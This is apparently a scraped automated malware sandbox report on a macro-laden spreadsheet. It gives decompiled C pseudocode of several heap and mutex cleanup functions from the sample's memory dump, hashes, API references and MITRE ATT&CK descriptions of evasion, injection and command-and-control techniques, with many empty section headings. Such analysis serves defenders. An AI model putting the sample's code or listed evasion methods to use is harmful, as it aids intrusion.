0x011576d7
0x011576d8
0x011576dd
0x011576ee
0x011576ee
0x011576f1
0x011576f6
0x0115770a
0x0115770d
0x0115770e
0x01157718
0x0115771f
0x01157730
0x01157736
0x0115773b
0x01157749
0x0115774f
0x01157752
0x01157755
0x01157755
0x0115773b
0x01157758
0x0115775e
0x01157795
0x01157760
0x01157766
0x00000000
0x0115778b
0x0115775e
0x011576f8
0x011576fb
0x011576fb
0x011576fd
0x011576fe
0x01157707
0x00000000
0x01157707
0x011576df
0x011576e2
0x011576e2
0x011576e4
0x011576e5
0x011576eb
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 01157729
HeapAlloc.KERNEL32(00000000), ref: 01157730
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01157742
HeapFree.KERNEL32(00000000), ref: 01157749

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 0571a21ab259c709277834d5ce51506bf436011c4c30a62d2d11a60eef026872
Instruction ID: 62922df86350b9091159effc06e388fe8a82a14c43dd224711ae0cfdbd282467
Opcode Fuzzy Hash: 0571a21ab259c709277834d5ce51506bf436011c4c30a62d2d11a60eef026872
Instruction Fuzzy Hash: 61416779900701DFCB69CF68C4849AABBF2FF48300B1486AEDC5A97741E731E901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01159900, Relevance: 5.1, APIs: 4, Instructions: 85
memoryCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E01159900(void* __eax, void* __edx) {
				signed int _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				int _t21;
				long _t24;
				signed char _t30;
				long _t31;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t47;
				long _t51;
				void* _t52;
				signed int _t56;
				void* _t57;

				_t45 = __edx;
				_t35 =  *0x115a058; // 0x0
				if(_t35 != 0) {
					_t54 = _t56;
					_push(_t35);
					_push(_t35);
					_t17 =  *0x115a064; // 0xc03c63c6
					_v8 = _t17 ^ _t56;
					_t33 = _t35;
					_t57 = _t56 - 0xc;
					_t3 = _t33 + 4; // 0x4
					_t37 = _t3;
					E01158DA2(_t3, __edx,  &_v12);
					_t21 =  *_t33 - 1;
					 *_t33 = _t21;
					if(_t21 != 0) {
						_t51 = _v12;
						goto L15;
					} else {
						_t51 = 0;
						_t4 = _t33 + 8; // 0x8
						E0115897F(_t4, 0);
						_t5 = _t33 + 0xc; // 0xc
						_t41 = _t5;
						_t21 = E0115897F(_t5, 0);
						if(_v12 != 0) {
							_t31 = GetLastError();
							_push(_v12);
							_t21 = E011573CA(_t41);
							SetLastError(_t31);
						}
						if( *0x115a418 == 0) {
							_t24 =  *0x115a424; // 0x1156dd0
							_v12 = _t24;
							if(_t24 == 0) {
								_t21 = _t51;
							} else {
								 *0x115b1b4();
								_t30 = _v12();
								if(_t57 != _t57) {
									asm("int 0x29");
								}
								_t21 = _t30 & 0x000000ff;
							}
							if(_t21 == 0) {
								_t10 = _t33 + 0x18; // 0x18
								E01158D4C(_t10);
								_t11 = _t33 + 8; // 0x8
								_t37 = _t11;
								E01158BFE(_t11);
								if( *((intOrPtr*)(_t33 + 4)) != _t51) {
									_push( *((intOrPtr*)(_t33 + 4)));
									E011573A3(_t33, _t37);
								}
								_t21 = HeapFree(GetProcessHeap(), _t51, _t33);
								L15:
								if(_t51 != 0) {
									_push(_t51);
									_t21 = E011573CA(_t37);
								}
							}
						}
					}
					_pop(_t47);
					_pop(_t52);
					_pop(_t34);
					return E01159250(_t21, _t34, _v8 ^ _t54, _t45, _t47, _t52);
				} else {
					return __eax;
				}
			}

0x01159900
0x01159900
0x01159908
0x01158b1b
0x01158b1d
0x01158b1e
0x01158b1f
0x01158b26
0x01158b2c
0x01158b2e
0x01158b35
0x01158b35
0x01158b38
0x01158b3f
0x01158b42
0x01158b44
0x01158be0
0x00000000
0x01158b4a
0x01158b4a
0x01158b4c
0x01158b50
0x01158b56
0x01158b56
0x01158b59
0x01158b61
0x01158b63
0x01158b69
0x01158b6e
0x01158b74
0x01158b74
0x01158b81
0x01158b83
0x01158b88
0x01158b8d
0x01158bac
0x01158b8f
0x01158b91
0x01158b99
0x01158b9e
0x01158ba5
0x01158ba5
0x01158ba7
0x01158ba7
0x01158bb0
0x01158bb2
0x01158bb5
0x01158bba
0x01158bba
0x01158bbd
0x01158bc5
0x01158bc7
0x01158bca
0x01158bca
0x01158bd8
0x01158be3
0x01158be5
0x01158be7
0x01158be8
0x01158be8
0x01158be5
0x01158bb0
0x01158b81
0x01158bf0
0x01158bf1
0x01158bf4
0x01158bfd
0x0115990e
0x0115990e
0x0115990e

APIs

GetLastError.KERNEL32(00000000,00000000,?), ref: 01158B63
SetLastError.KERNEL32(00000000,?), ref: 01158B74
GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 01158BD1
HeapFree.KERNEL32(00000000,?,00000000,00000000,?), ref: 01158BD8

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHeapLast$FreeProcess
String ID:
API String ID: 1234203156-0
Opcode ID: 1e462a2df1f5c3f2ac734124450effa1ac7bfbb1a20dffa1087129831abce454
Instruction ID: a66d7eface890c56738cac63ce05897e08d7ca69f20bbca4437d2cb17392dcc0
Opcode Fuzzy Hash: 1e462a2df1f5c3f2ac734124450effa1ac7bfbb1a20dffa1087129831abce454
Instruction Fuzzy Hash: 202128B0504204DFCB9CAF7AE8859BEBB7DEF50304B040069ED368B189DF348984C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01158B18, Relevance: 5.1, APIs: 4, Instructions: 83
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E01158B18(int* __ecx) {
				signed int _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t20;
				long _t23;
				signed char _t29;
				long _t30;
				void* _t32;
				void* _t33;
				void* _t44;
				void* _t46;
				long _t50;
				void* _t51;
				signed int _t52;
				void* _t53;
				void* _t54;

				_push(__ecx);
				_push(__ecx);
				_t16 =  *0x115a064; // 0xc03c63c6
				_v8 = _t16 ^ _t52;
				_t32 = __ecx;
				_t54 = _t53 - 0xc;
				_t3 = _t32 + 4; // 0x4
				_t36 = _t3;
				E01158DA2(_t3, _t44,  &_v12);
				_t20 =  *__ecx - 1;
				 *__ecx = _t20;
				if(_t20 != 0) {
					_t50 = _v12;
					L14:
					if(_t50 != 0) {
						_push(_t50);
						_t20 = E011573CA(_t36);
					}
					L16:
					_pop(_t46);
					_pop(_t51);
					_pop(_t33);
					return E01159250(_t20, _t33, _v8 ^ _t52, _t44, _t46, _t51);
				}
				_t50 = 0;
				_t4 = _t32 + 8; // 0x8
				E0115897F(_t4, 0);
				_t5 = _t32 + 0xc; // 0xc
				_t40 = _t5;
				_t20 = E0115897F(_t5, 0);
				if(_v12 != 0) {
					_t30 = GetLastError();
					_push(_v12);
					_t20 = E011573CA(_t40);
					SetLastError(_t30);
				}
				if( *0x115a418 != 0) {
					goto L16;
				} else {
					_t23 =  *0x115a424; // 0x1156dd0
					_v12 = _t23;
					if(_t23 == 0) {
						_t20 = _t50;
					} else {
						 *0x115b1b4();
						_t29 = _v12();
						if(_t54 != _t54) {
							asm("int 0x29");
						}
						_t20 = _t29 & 0x000000ff;
					}
					if(_t20 != 0) {
						goto L16;
					} else {
						_t10 = _t32 + 0x18; // 0x18
						E01158D4C(_t10);
						_t11 = _t32 + 8; // 0x8
						_t36 = _t11;
						E01158BFE(_t11);
						if( *((intOrPtr*)(_t32 + 4)) != _t50) {
							_push( *((intOrPtr*)(_t32 + 4)));
							E011573A3(_t32, _t36);
						}
						_t20 = HeapFree(GetProcessHeap(), _t50, _t32);
						goto L14;
					}
				}
			}

0x01158b1d
0x01158b1e
0x01158b1f
0x01158b26
0x01158b2c
0x01158b2e
0x01158b35
0x01158b35
0x01158b38
0x01158b3f
0x01158b42
0x01158b44
0x01158be0
0x01158be3
0x01158be5
0x01158be7
0x01158be8
0x01158be8
0x01158bed
0x01158bf0
0x01158bf1
0x01158bf4
0x01158bfd
0x01158bfd
0x01158b4a
0x01158b4c
0x01158b50
0x01158b56
0x01158b56
0x01158b59
0x01158b61
0x01158b63
0x01158b69
0x01158b6e
0x01158b74
0x01158b74
0x01158b81
0x00000000
0x01158b83
0x01158b83
0x01158b88
0x01158b8d
0x01158bac
0x01158b8f
0x01158b91
0x01158b99
0x01158b9e
0x01158ba5
0x01158ba5
0x01158ba7
0x01158ba7
0x01158bb0
0x00000000
0x01158bb2
0x01158bb2
0x01158bb5
0x01158bba
0x01158bba
0x01158bbd
0x01158bc5
0x01158bc7
0x01158bca
0x01158bca
0x01158bd8
0x00000000
0x01158bd8
0x01158bb0

APIs

Part of subcall function 01158DA2: WaitForSingleObjectEx.KERNEL32(0115A054,000000FF,00000000,0115A054,00000000,?,01158A40,?,?,0115A054,00000000), ref: 01158DB1

Part of subcall function 0115897F: GetLastError.KERNEL32(?,00000000,?,?,01158960,00000000,?,?,?,?,0115745B,?,00000001,?), ref: 0115898F
Part of subcall function 0115897F: SetLastError.KERNEL32(00000000,?,00000000,?,?,01158960,00000000,?,?,?,?,0115745B,?,00000001,?), ref: 0115899E

SetLastError.KERNEL32(00000000,?), ref: 01158B74
GetLastError.KERNEL32(00000000,00000000,?), ref: 01158B63

Part of subcall function 011573CA: ReleaseMutex.KERNEL32(?), ref: 011573D2

GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 01158BD1
HeapFree.KERNEL32(00000000,?,00000000,00000000,?), ref: 01158BD8

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$Heap$FreeMutexObjectProcessReleaseSingleWait
String ID:
API String ID: 2060072361-0
Opcode ID: fe0ee671e6c50cd1c1c556df38f3a1b90807c6b3be78942217da9fc28d4abcd1
Instruction ID: b7178cf7f63659c45eb7b2321ab948ed69cfdceeade4fbf7654f9f66cee2999e
Opcode Fuzzy Hash: fe0ee671e6c50cd1c1c556df38f3a1b90807c6b3be78942217da9fc28d4abcd1
Instruction Fuzzy Hash: 1521D6B1504214EFCB9CAF6AE8859BDBB7DEF50304B0440A9ED259B189DF749940C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01157798, Relevance: 5.0, APIs: 4, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01157798(void* __ecx) {
				void* _t20;
				void* _t22;
				void* _t23;
				void** _t25;

				_t23 = __ecx;
				_t22 =  *(__ecx + 0x10);
				_t20 = _t22 + ( *(__ecx + 0x14) & 0x0000ffff) * 0x34;
				if(_t22 != _t20) {
					_t25 = _t22 + 0x2c;
					do {
						HeapFree(GetProcessHeap(), 0,  *_t25);
						 *_t25 =  *_t25 & 0x00000000;
						_t25 =  &(_t25[0xd]);
						 *(_t25 - 0x30) =  *(_t25 - 0x30) & 0x00000000;
					} while (_t25 - 0x2c != _t20);
					_t22 =  *(_t23 + 0x10);
				}
				HeapFree(GetProcessHeap(), 0, _t22);
				 *(_t23 + 0x10) =  *(_t23 + 0x10) & 0;
				 *((intOrPtr*)(_t23 + 0x14)) = 0;
				return 0;
			}

0x0115779c
0x011577a2
0x011577a8
0x011577ac
0x011577af
0x011577b2
0x011577bd
0x011577c3
0x011577c6
0x011577c9
0x011577d0
0x011577d4
0x011577d7
0x011577e2
0x011577ea
0x011577ed
0x011577f2

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,01158D77,?,?,00000000,?,?,?,?,01158B01,?,?), ref: 011577B6
HeapFree.KERNEL32(00000000,?,?,?,?,01158B01,?,?,?,0115A054,00000000), ref: 011577BD
GetProcessHeap.KERNEL32(00000000,?,?,?,01158D77,?,?,00000000,?,?,?,?,01158B01,?,?), ref: 011577DB
HeapFree.KERNEL32(00000000,?,?,?,?,01158B01,?,?,?,0115A054,00000000), ref: 011577E2

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: a74c02282b7bcc6290d0dac8b745bfdbc886f5cbe83a27757f397a3a8065d636
Instruction ID: 7dee201659ea13217a3e42a903b7065050b37407bc2587133bdac67564c6b605
Opcode Fuzzy Hash: a74c02282b7bcc6290d0dac8b745bfdbc886f5cbe83a27757f397a3a8065d636
Instruction Fuzzy Hash: 1FF04F72614701EFD7688FA0E889B69B7F9FF44312F10092AE665C7480D774E4D5CBA4

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report document-47-2637.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "document-47-2637.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81910

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Function 01153367, Relevance: 71.9, APIs: 21, Strings: 20, Instructions: 160
libraryloaderCOMMON

Function 01159380, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 011559D4, Relevance: 47.6, APIs: 19, Strings: 8, Instructions: 308
memoryCOMMON

Function 01159083, Relevance: 10.6, APIs: 7, Instructions: 99
sleepCOMMON

Function 01159583, Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Function 011596D1, Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Function 01159910, Relevance: 2.5, APIs: 2, Instructions: 32
memoryCOMMON

Function 01158F20, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 01154B60, Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 278
fileCOMMON

Function 01156A55, Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 173
windowthreadCOMMON

Function 0115441E, Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 113
filelibraryCOMMON

Function 01154181, Relevance: 18.2, APIs: 3, Strings: 9, Instructions: 167
stringCOMMON

Function 011556A6, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 153
fileCOMMON

Function 01155DFA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 93
COMMON

Function 0115748E, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101
synchronizationCOMMON

Function 01156275, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88
registryCOMMON

Function 01156106, Relevance: 7.6, APIs: 5, Instructions: 108
COMMON

Function 011575A9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73
COMMON

Function 01158C1F, Relevance: 6.4, APIs: 5, Instructions: 110
memoryCOMMON

Function 01155F98, Relevance: 6.1, APIs: 4, Instructions: 59
fileCOMMON

Function 01158F80, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Function 011589B0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119
synchronizationCOMMON

Function 01157684, Relevance: 5.1, APIs: 4, Instructions: 106
memoryCOMMON

Function 01159900, Relevance: 5.1, APIs: 4, Instructions: 85
memoryCOMMON

Function 01158B18, Relevance: 5.1, APIs: 4, Instructions: 83
memoryCOMMON

Function 01157798, Relevance: 5.0, APIs: 4, Instructions: 36
memoryCOMMON